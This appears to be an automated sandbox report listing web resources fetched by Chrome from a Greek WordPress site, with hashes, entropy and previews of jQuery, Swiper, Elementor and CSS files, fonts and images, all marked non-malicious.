                                Preview:.PNG........IHDR...,...-......VVd....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.5.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:exif="http://ns.adobe.com/exif/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". exif:PixelXDimension="300". exif:PixelYDimension="45". exif:ColorSpace="1". tiff:ImageWidth="300". tiff:ImageLength="45". tiff:ResolutionUnit="2". tiff:XResolution="72.0". tiff:YResolution="72.0". photoshop:ColorMode="3". photoshop:ICCProfile="sRGB IEC61966-2.1". xmp:ModifyDate="2022-04-07T12:43:13+03:00". xmp:MetadataDate="2022-04-07T12:43:13+03:00">. <xmpMM:History>. <rdf:Se
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (13479)
                                Category:dropped
                                Size (bytes):13577
                                Entropy (8bit):5.272065782731947
                                Encrypted:false
                                SSDEEP:
                                MD5:9FFEB32E2D9EFBF8F70CAABDED242267
                                SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
                                SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
                                SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
                                Malicious:false
                                Reputation:unknown
                                Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text
                                Category:downloaded
                                Size (bytes):9143
                                Entropy (8bit):4.193470267282693
                                Encrypted:false
                                SSDEEP:
                                MD5:D67A8CE213049009CB6AE36D217D0CBF
                                SHA1:3ECC793F3C4EDD8C92786DCFD4ED83B17C78B50F
                                SHA-256:ED47835F6EA0CA61B84DC3D031B93757A386439985C1C823933C57F1DC943992
                                SHA-512:BCA604E8BD1B48BC51AA511E207B1CAC0AD2237F16C4F61CB248AC7699F7244B750C8015274BEB69F43557F820CD8D8023CE8C89838712DE5366AA207E6C4B4F
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/qi-addons-for-elementor/inc/shortcodes/parallax-images/assets/js/plugins/jquery.parallax-scroll.js?ver=1
                                Preview:// jQuery(function() {.// ParallaxScroll.init();.// });..var ParallaxScroll = {. /* PUBLIC VARIABLES */. showLogs: false,. round: 1000,.. /* PUBLIC FUNCTIONS */. init: function() {. this._log("init");. if (this._inited) {. this._log("Already Inited");. this._inited = true;. return;. }. this._requestAnimationFrame = (function(){. return window.requestAnimationFrame || . window.webkitRequestAnimationFrame || . window.mozRequestAnimationFrame || . window.oRequestAnimationFrame || . window.msRequestAnimationFrame || . function(/* function */ callback, /* DOMElement */ element){. window.setTimeout(callback, 1000 / 60);. };. })();. this._onScroll(true);. },.. /* PRIVATE VARIABLES */. _inited: false,. _properties: ['x', 'y', 'z', 'rotateX',
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65284)
                                Category:dropped
                                Size (bytes):140890
                                Entropy (8bit):5.213430265368241
                                Encrypted:false
                                SSDEEP:
                                MD5:AD2B984FE68303C7FD990F49DD125F9E
                                SHA1:A7970D44348A8709EB519F5B9DAF870D0BA9426A
                                SHA-256:0D99312788AAAC576BE48996454890F9BFA4DF8A6F94FDAB5AD1366B8D846D2A
                                SHA-512:AA56DC724606431633857BAA0712C32A7755BA1ED1A342AD61F0D13792F3F27EF3635A85EB9B6BA44C65128FE7956FF77C8A14B643C5D00349F3CFFD075BA42D
                                Malicious:false
                                Reputation:unknown
                                Preview:/**. * Swiper 5.4.5. * Most modern mobile touch slider and framework with hardware accelerated transitions. * http://swiperjs.com. *. * Copyright 2014-2020 Vladimir Kharlampidi. *. * Released under the MIT License. *. * Released on: June 16, 2020. */..!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e=e||self).Swiper=t()}(this,(function(){"use strict";function e(e){return null!==e&&"object"==typeof e&&"constructor"in e&&e.constructor===Object}function t(i,s){void 0===i&&(i={}),void 0===s&&(s={}),Object.keys(s).forEach((function(a){void 0===i[a]?i[a]=s[a]:e(s[a])&&e(i[a])&&Object.keys(s[a]).length>0&&t(i[a],s[a])}))}var i="undefined"!=typeof document?document:{},s={body:{},addEventListener:function(){},removeEventListener:function(){},activeElement:{blur:function(){},nodeName:""},querySelector:function(){return null},querySelectorAll:function(){return[]},getElementById:function(){return null},createEv
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (57765)
                                Category:downloaded
                                Size (bytes):112427
                                Entropy (8bit):4.925295015861728
                                Encrypted:false
                                SSDEEP:
                                MD5:319580D7D8944A1A65F635E0D11E5DA5
                                SHA1:E23BC18EF1B0F78F7010E3C16E4C5E1F333248BD
                                SHA-256:FB3A89CC6347E098063BD15F285BC90411846DDCE6F17812364FEEDAB67A67F5
                                SHA-512:743825EAEA11208277528E506C115EC786AB060095AE4250C65A9B02FE9E5CB2AC5AC386532486A2678B9615490CE75BA096A9FD2041200989AD07A726B5D9D0
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2
                                Preview:@charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (8189)
                                Category:dropped
                                Size (bytes):21464
                                Entropy (8bit):5.303481082929494
                                Encrypted:false
                                SSDEEP:
                                MD5:8FBC22C79D40119DDE9A5D16897002B9
                                SHA1:E9837519ACA724457792E2D5EE98A97A0367CDF9
                                SHA-256:7E84C9F8D71BC6EB2DAC2FCE59A6CAEA62DA51FFA8CF56B41806F59386AB1322
                                SHA-512:3118A198A3710C839C15D6C4B5DC9F9ADCD637913AF2E26F438B01C80B27281F4937E25AAD2817855D8B3EB36207C61AE16D62B17E698799C5316E86F52AC6FC
                                Malicious:false
                                Reputation:unknown
                                Preview:/*! jQuery UI - v1.13.3 - 2024-04-26.* https://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-patch.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sort
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", baseline, precision 8, 1536x864, components 3
                                Category:dropped
                                Size (bytes):125388
                                Entropy (8bit):7.952321535317021
                                Encrypted:false
                                SSDEEP:
                                MD5:0A58B26F7398C3A241A34680F4913C99
                                SHA1:9A639CC1B6323FAABFAFE42593A5AB2A872A4751
                                SHA-256:786B5AA88C8AC98E140AD001142939BD0FFC0D7DAB47A8CAAC7387B7684D3554
                                SHA-512:27E48E4DEA39E9ED9EBAA5903C55ADCDEDE0063BE73B8146E0F6F1C964739EE3D3247568675897A5848C6169FE1349B571FF1D16AA59EFE7AB27C5C715EBE5B2
                                Malicious:false
                                Reputation:unknown
                                Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......`...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...)*.3Fh....(........ .4..QM=i..i.FM%..PzSs@....FM..I.(...).R.ZC@...QL.......(......&i..By....d.IM. .E3&...q...Hh.rh..4...f....R..g....F.`I.R../Q.........f....>..i..4.Fj.\........y.@.\R}.W...D?..0V`.^..*...a...........}....k.....kGo....*..P..6.3zn...;.p..S...z..e..O.i.c..,.J.6..M..Dc.8.G.@....9.;.+..
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (14238)
                                Category:downloaded
                                Size (bytes):14277
                                Entropy (8bit):5.115718071902619
                                Encrypted:false
                                SSDEEP:
                                MD5:34A615B230E332B8266F2B6CB0FC6F26
                                SHA1:F6D5A2614ECFFB3E1865D88344EB058B1DEB85A2
                                SHA-256:EB8087EDC955367C5780F4105C7EE3E7B2780F89E6790EE3AC69F35BBF00D972
                                SHA-512:C6A1F7CDCE06D3911A952F21EE19A9FF2647CA7933A5C830EE1FA055FE5EE9E59A06860B4F83B95EE6EF2AD21D0445162C31402658BE476D216234519CF24025
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.6.4
                                Preview:/*! elementor - v3.6.4 - 13-04-2022 */.(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[354],{7914:e=>{e.exports=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}},e.exports.default=e.exports,e.exports.__esModule=!0},381:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;t.default=(e,t)=>{t=Array.isArray(t)?t:[t];for(const n of t)if(e.constructor.name===n.prototype[Symbol.toStringTag])return!0;return!1}},8135:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.ViewModule{getDefaultSettings(){return{selectors:{elements:".elementor-element",nestedDocumentElements:".elementor .elementor-element"},classes:{editMode:"elementor-edit-mode"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$elements:this.$element.find(e.elements).not(this.$element.find(e.nestedDocumentElements))}}getDocumentSettings(e){let t;if(this.isEdit){t={
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (8461)
                                Category:dropped
                                Size (bytes):19434
                                Entropy (8bit):5.2473235749950335
                                Encrypted:false
                                SSDEEP:
                                MD5:91DEC18028A30508907BA9742BCC974D
                                SHA1:22D8374DE47F960DF471EB8B8347FDE1D0C48734
                                SHA-256:563D68C66C5496F796530A42947FC92FE1DFB5A78262F6E5E51490357D85AACB
                                SHA-512:4A0C158539C85CE119DB0398431D04CE4326E0E7CFA2FE88687BD147CC6CBDF2015D6FA16646FAB80653BC07E068F2A0DD1E1197D3A9FCB5BF622560AD3F1378
                                Malicious:false
                                Reputation:unknown
                                Preview:/*!. * perfect-scrollbar v1.5.0. * Copyright 2020 Hyunje Jun, MDBootstrap and Contributors. * Licensed under MIT. */(function(a,b){"object"==typeof exports&&"undefined"!=typeof module?module.exports=b():"function"==typeof define&&define.amd?define(b):(a=a||self,a.PerfectScrollbar=b())})(this,function(){'use strict';var u=Math.abs,v=Math.floor;function a(a){return getComputedStyle(a)}function b(a,b){for(var c in b){var d=b[c];"number"==typeof d&&(d+="px"),a.style[c]=d}return a}function c(a){var b=document.createElement("div");return b.className=a,b}function d(a,b){if(!w)throw new Error("No element matching method supported");return w.call(a,b)}function e(a){a.remove?a.remove():a.parentNode&&a.parentNode.removeChild(a)}function f(a,b){return Array.prototype.filter.call(a.children,function(a){return d(a,b)})}function g(a,b){var c=a.element.classList,d=z.state.scrolling(b);c.contains(d)?clearTimeout(A[b]):c.add(d)}function h(a,b){A[b]=setTimeout(function(){return a.isAlive&&a.element.class
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:downloaded
                                Size (bytes):211242
                                Entropy (8bit):4.968014211550129
                                Encrypted:false
                                SSDEEP:
                                MD5:95A18E8F6DA8581FAE49187A884E0854
                                SHA1:7C546541E884ABD647BE0C3DFA97A58698F4F197
                                SHA-256:7E11952C21F73E3771B916E47331327E7F97C48119ECC5C799896783C0F3663E
                                SHA-512:8972C5B5E79227FD4965AFBCA85F3CD519A0F9C4816CA4D138C07B76C7DD281C4FAF17EA36A0FE4EF1DD917D9ECAB59C9B0B503ED2E7F109A5ECAE6A84068378
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/themes/brok/assets/css/main.min.css?ver=6.6.2
                                Preview::root{--qode-main-color:#000;--qode-header-light-color:#fff;--qode-header-light-hover-color:#fff;--qode-header-dark-color:#000;--qode-header-dark-hover-color:#000}@keyframes qode-rotate{0%{transform:rotate(0)}100%{transform:rotate(360deg)}}@keyframes qode-fade-in{0%{opacity:0;visibility:hidden}100%{opacity:1;visibility:visible}}@keyframes qode-fade-out{0%{opacity:1;visibility:visible}100%{opacity:0;visibility:hidden}}@keyframes qode-ball-fall{0%{opacity:0;transform:translateY(-145%)}10%{opacity:.5}20%{opacity:1;transform:translateY(0)}80%{opacity:1;transform:translateY(0)}90%{opacity:.5}100%{opacity:0;transform:translateY(145%)}}@keyframes qode-scaleout{0%{-webkit-transform:scale(0)}100%{-webkit-transform:scale(1);opacity:0}}@keyframes qode-double-pulse{0%,100%{transform:scale(0)}50%{transform:scale(1)}}@keyframes qode-cube{0%{transform:perspective(120px) rotateX(0) rotateY(0)}50%{transform:perspective(120px) rotateX(-180.1deg) rotateY(0)}100%{transform:perspective(120px) rotateX(-180d
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (44829), with no line terminators
                                Category:downloaded
                                Size (bytes):44829
                                Entropy (8bit):4.852924637885068
                                Encrypted:false
                                SSDEEP:
                                MD5:46F3828987ABFE191055866B67F5C557
                                SHA1:A3DA2FE145EF0CE39134929C4477721C9C22E640
                                SHA-256:B138149C51B320BEE8CE24DE1AC6E8D21EAD245BA090C2F5F458155A30A0410F
                                SHA-512:9470197003B22D6160B1E64F4B4CF8F1E87DC81B4A3859DA74C2A75989C85B8A5B033AAE917220B6E161B3DCE59B8EF95224821AC1412DFA494729EE89D3474E
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/qi-addons-for-elementor/assets/css/grid.min.css?ver=6.6.2
                                Preview:.qodef-qi-grid>.qodef-grid-inner{position:relative;display:grid;gap:30px}.qodef-qi-grid>.qodef-grid-inner>.qodef-grid-item.qodef-order--1{order:1}.qodef-qi-grid>.qodef-grid-inner>.qodef-grid-item.qodef-order--2{order:2}.qodef-qi-grid>.qodef-grid-inner>.qodef-grid-item.qodef-order--3{order:3}.qodef-qi-grid>.qodef-grid-inner>.qodef-grid-item.qodef-order--4{order:4}.qodef-qi-grid>.qodef-grid-inner>.qodef-grid-item.qodef-order--5{order:5}.qodef-qi-grid>.qodef-grid-inner>.qodef-grid-item.qodef-order--6{order:6}.qodef-qi-grid>.qodef-grid-inner>.qodef-grid-item.qodef-order--7{order:7}.qodef-qi-grid>.qodef-grid-inner>.qodef-grid-item.qodef-order--8{order:8}.qodef-qi-grid>.qodef-grid-inner>.qodef-grid-item.qodef-order--9{order:9}.qodef-qi-grid>.qodef-grid-inner>.qodef-grid-item.qodef-order--10{order:10}.qodef-qi-grid>.qodef-grid-inner>.qodef-grid-item.qodef-order--11{order:11}.qodef-qi-grid>.qodef-grid-inner.qodef-qi-clear:after,.qodef-qi-grid>.qodef-grid-inner.qodef-qi-clear:before{display:non
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text
                                Category:downloaded
                                Size (bytes):9435
                                Entropy (8bit):5.436177646162953
                                Encrypted:false
                                SSDEEP:
                                MD5:29FFCD23D3FE97EDEB4B8B4D8E176B03
                                SHA1:38C613AA3E6D455AAB7C82ECCBC316CE5EB04C4E
                                SHA-256:8031131CE519783FD4CD531F4CC40674FEAFEDA39FC9C853CD26E8FF1E967F0C
                                SHA-512:0675836FFD7EE6E1A3AB28CAB4468DC0804E141FFDB309726888950F6EE780D0498DBCACF3E1C335F848C4DE21FB32771589D110A35721CBDEA3D646D284D401
                                Malicious:false
                                Reputation:unknown
                                URL:https://fonts.googleapis.com/css?family=Montserrat%3A300%2C400%2C500%2C600%2C700&subset=latin-ext&display=swap&ver=1.0.0
                                Preview:/* cyrillic-ext */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, datetime=2022:12:08 11:32:18], baseline, precision 8, 650x450, components 3
                                Category:dropped
                                Size (bytes):60894
                                Entropy (8bit):7.8277140920796136
                                Encrypted:false
                                SSDEEP:
                                MD5:64387AEB4B2A4DB68687C72849562CC0
                                SHA1:47D2258BF1A16673782F5DA3CE3C7FE15F1D8884
                                SHA-256:6626EA60D72FA684E73C1506E03D5C84A6124281161913CF11F6F056B1334467
                                SHA-512:CBD52132BF3171B67A4E8985261530D034681C279B9B4DB63F9C69A5943760BE1997800D1202E905DB4AE718EF6A959C82AF5506A067510A2BB73A61CB17D4F2
                                Malicious:false
                                Reputation:unknown
                                Preview:......JFIF.....H.H......Exif..MM.*.................J...........R.(...........2.........Z.i.........n.......H.......H....2022:12:08 11:32:18..............................................Chttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.5.0"> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmp:ModifyDate="2022-12-08T11:32:18+02:00" xmp:MetadataDate="2022-12-08T11:32:18+02:00"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="produced" stEvt:softwareAgent="Affinity Designer 1.9.0" stEvt:when="2022-12-08T11:32:18+02:00"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta>
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 480 x 246, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):7154
                                Entropy (8bit):7.733525448802238
                                Encrypted:false
                                SSDEEP:
                                MD5:ED96F8D08091019FD570C13B6B57BB9A
                                SHA1:E255814A04A9088E4EC0347E94F7AC3EA877A9FB
                                SHA-256:D4D1AF8776862B0A3B1355BE7AEC864CD4DC4C829D84B8379F4AE93CF97E2982
                                SHA-512:59F788656A8EFD279A962B2CD9E34BF221DC10EE1FD14843B2568203EEAD023C5813729D49C7DF172F242BF2C5F054AAF6110E4F3E30825154F5AC18C87D55BF
                                Malicious:false
                                Reputation:unknown
                                Preview:.PNG........IHDR..............,T.....sRGB.........pHYs..,K..,K..=......iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2022-04-15</Attrib:Created>. <Attrib:ExtId>5f524c01-979f-4356-8dec-cf106331e700</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:pdf='http://ns.adobe.com/pdf/1.3/'>. <pdf:Author>The Creatives</pdf:Author>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:xmp='http://ns.adobe.com/xap/1.0/'>. <xmp:CreatorTool>Canva</xmp:CreatorTool>. </rdf:Description>.</rdf:RDF>.</x:xmpmeta>.<?xpacket end='r'?>
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (59558), with no line terminators
                                Category:dropped
                                Size (bytes):59558
                                Entropy (8bit):5.128554724254805
                                Encrypted:false
                                SSDEEP:
                                MD5:53EC6AC2C2FB9DEEAE91BB7509A57E07
                                SHA1:9B5720DF3585B9A923C676007CD385A98A2C96DE
                                SHA-256:E595D2FC738CFB4F0AC26E710848510DDDBB6C776DF31AA90EB7CACB08977AAE
                                SHA-512:62CF3E67F2154D8B37369D9B4D970AAE6EC627D1428A758C5250CA83BF3CF05A464CA7E7816047C95962C17AA70435C8F7662DE0E18AD9F5F114E124EA87EF58
                                Malicious:false
                                Reputation:unknown
                                Preview:!function(d){"use strict";window.qodefAddonsCore={},qodefAddonsCore.shortcodes={},qodefAddonsCore.body=d("body"),qodefAddonsCore.html=d("html"),qodefAddonsCore.windowWidth=d(window).width(),qodefAddonsCore.windowHeight=d(window).height(),qodefAddonsCore.scroll=0,d(document).ready(function(){qodefAddonsCore.scroll=d(window).scrollTop(),x.init(),e.init()}),d(window).resize(function(){qodefAddonsCore.windowWidth=d(window).width(),qodefAddonsCore.windowHeight=d(window).height()}),d(window).scroll(function(){qodefAddonsCore.scroll=d(window).scrollTop()}),d(window).on("load",function(){o.init()});var x={init:function(e){this.holder=d(".qodef-qi-swiper-container"),d.extend(this.holder,e),this.holder.length&&this.holder.each(function(){x.initSlider(d(this))})},initSlider:function(o){var t,n=x.getOptions(o),i=x.getEvents(o,n);elementorFrontend.config.experimentalFeatures.e_optimized_assets_loading?t=setInterval(function(){if("undefined"!==elementorFrontend.utils.swiper){const e=elementorFronten
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Web Open Font Format (Version 2), TrueType, length 33092, version 1.0
                                Category:downloaded
                                Size (bytes):33092
                                Entropy (8bit):7.993894754675653
                                Encrypted:true
                                SSDEEP:
                                MD5:057478083C1D55EA0C2182B24F6DD72F
                                SHA1:CAF557CD276A76992084EFC4C8857B66791A6B7F
                                SHA-256:BB2F90081933C0F2475883CA2C5CFEE94E96D7314A09433FFFC42E37F4CFFD3B
                                SHA-512:98FF4416DB333E5A5A8F8F299C393DD1A50F574A2C1C601A0724A8EA7FB652F6EC0BA2267390327185EBEA55F5C5049AB486D88B4C5FC1585A6A975238507A15
                                Malicious:false
                                Reputation:unknown
                                URL:https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
                                Preview:wOF2.......D......6...............................a......Z?HVAR...`?STAT.8'2..F/~.....|.M....0....6.$.... ..x..<..[.%Q.i.<.N..t.Yx..5.A...|..g#l....5.....D.Bt.......l.Y].)..(..H.s..V..r*uM....[.**....I.0h.v.Hc.R..]....`$.I)G.+.}....E%.H..|..%nEE.....+.x..7|........[..V....[.......0...CA.._....)2.$.....s_fw....+.V.H.B.<?.?..mloc..1.Q....a.r#...)......|.F>..../6-.......t......>......tO.:f@b....u.I(.Bc..b....7.?A.....vE.}...kb]W7.h..$@......T1t.8.._?...~..,..I..."Y...1..s.V........R.Bf2..I....s.........u.P.&..D./"2qf....p.sv..)b5.yR.$MR3.@.E../>{w.....f...cN...2.v.....]>..Ow...9/!v...r..1.4.n.w...T......=...hRH!.....2`...u..82L...S.v.ik^.V.....@..N....d{..{...NN"'.H...H$..H.<..{?..x.....zv.}.~.N)4.g...X.....8|}...e,%.:..;.Q..88...@..=UVHe....g..zD?..U...~.J...oMoP..6B"Y.{BN...vY<.o..r.7.7j%.Z%.'...]...........YK...,.a-;.M....>\.......%'+8Z.1K.y...9.(;.5 ..M..L.(..9...T)........hx..i2Y...m*..{ulY...d......")^.,.n.~..r..S.o.$.....6=.i...N.....q0 ....
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (42889)
                                Category:dropped
                                Size (bytes):124134
                                Entropy (8bit):5.546048868739929
                                Encrypted:false
                                SSDEEP:
                                MD5:E4BC260935352E71791596E3C8B0C205
                                SHA1:336EFF1507C4D4F88BBC8F9630F405E827357CDE
                                SHA-256:A5F70E90E97E6AC1952A1A116DBA485B468FA98DCA2977853768A946227C7BC0
                                SHA-512:76C8EA39F70E55665C197F90D7AE38633F3A3BA3F9295D289A7B7C2AEE861DCEEA77B57FA79E0F898C4FD81AB708D5A5C1E28BFD05F0B9D92FFA6A24109EE795
                                Malicious:false
                                Reputation:unknown
